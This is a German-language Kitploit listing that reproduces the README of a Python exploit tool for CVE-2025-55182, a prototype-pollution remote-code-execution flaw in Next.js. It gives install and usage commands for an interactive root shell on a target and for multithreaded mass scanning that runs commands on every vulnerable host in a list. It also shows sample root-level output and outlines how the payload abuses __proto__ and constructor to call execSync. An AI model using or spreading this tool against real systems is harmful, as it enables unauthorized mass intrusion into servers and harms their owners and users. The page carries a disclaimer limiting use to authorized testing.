Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-React2shell — CVE-2025-55182 Exploit-Tool – Python-2.7-Exploit für Next.js-Prototype-Pollution, die zu RCE führt | Kitploit
Tools/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

CVE-2025-55182 Exploit-Tool – Python-2.7-Exploit für Next.js-Prototype-Pollution, die zu RCE führt

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
61vor 2 MonatenNoch nicht geprüft

CVE-2025-55182 - React2shell

Ein Python-2.7-Exploit für CVE-2025-55182 – eine kritische Prototype Pollution / RCE-Sicherheitslücke in Next.js-Anwendungen.
Dieses Tool ermöglicht sowohl eine interaktive Shell für einzelne Ziele als auch Massen-Scans mehrerer Hosts mit Multithreading, farbiger Ausgabe und automatischem HTTPS-Fallback.


🚀 Funktionen

  • ✅ Interaktive Shell für einzelne Ziele – beliebige Systembefehle ausführen
  • ✅ Massen-Scan aus einer Dateiliste – multithreaded, schnell, Ergebnisse werden automatisch gespeichert
  • ✅ Auto-Erkennung – einzelne URL → Shell-Modus, vorhandene Datei → Massen-Scan-Modus
  • ✅ Automatisches HTTPS – fügt https:// hinzu, wenn kein Protokoll angegeben ist
  • ✅ Thread-sicheres Schreiben von Dateien – speichert verwundbare Ergebnisse in Echtzeit
  • ✅ Benutzerdefinierte Befehle – ändere den Standardbefehl id in einen beliebigen Befehl (whoami, ls, etc.)
  • ✅ Keine externen Abhängigkeiten – nur requests (leicht installierbar)

📋 Voraussetzungen

  • Python 2.7 (das Tool ist speziell für Python 2.7 geschrieben)
  • requests-Bibliothek – Installation mit:
    root@kitploit:~
    pip install requests
    

· Ein Terminal, das ANSI-Farben unterstützt (die meisten Linux/macOS-Terminals, Windows Terminal, PowerShell)

📦 Installation

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

Das Skript ausführbar machen (optional):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 Verwendung

  1. Interaktive Shell (Einzelziel)
root@kitploit:~
python2 CVE-2025-55182.py https://target.com

oder ohne Protokoll (HTTPS wird automatisch hinzugefügt):

root@kitploit:~
python2 CVE-2025-55182.py target.com

Sobald die Verbindung hergestellt und die Verwundbarkeit bestätigt ist, erhältst du einen Shell-Prompt:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

Integrierte Befehle:

· exit / quit – Shell schließen · clear – Bildschirm löschen · help – Hilfe anzeigen

  1. Massen-Scan (Liste von Zielen)

Bereite eine Datei mit einem Ziel pro Zeile vor (mit oder ohne http/https):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

Massen-Scan ausführen (Standard: 10 Threads, Befehl id, Ausgabe res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

Threads, Befehl und Ausgabedatei anpassen:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt

· 20 – Anzahl der Threads · whoami – Befehl, der auf jedem verwundbaren Ziel ausgeführt wird · results.txt – Ausgabedatei (nur verwundbare Einträge werden gespeichert)

Beispiel für die Massen-Scan-Ausgabe:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

Gespeicherte Ergebnisse (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 So funktioniert es

Der Exploit sendet eine präparierte multipart/form-data-Anfrage an einen Next.js-Endpunkt (/login wird angehängt, wenn der Pfad leer ist). Er missbraucht Prototype Pollution (__proto__:then und constructor:constructor), um ein schädliches Präfix einzuschleusen, das mit child_process.execSync() einen Systembefehl ausführt.

Der Server antwortet mit einer 303-Weiterleitung, die die Befehlsausgabe im x-action-redirect-Header (oder Location) enthält. Das Tool extrahiert das Ergebnis aus /login?a=.


🛡️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keinerlei Haftung für Missbrauch oder Schäden, die durch diese Software verursacht werden. Du musst die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems einholen, bevor du diesen Exploit verwendest.

Weitere Haftungsausschlüsse findest du auf der Profilseite von Jenderal92. Du kannst sie HIER !!! ansehen.

Tool herunterladen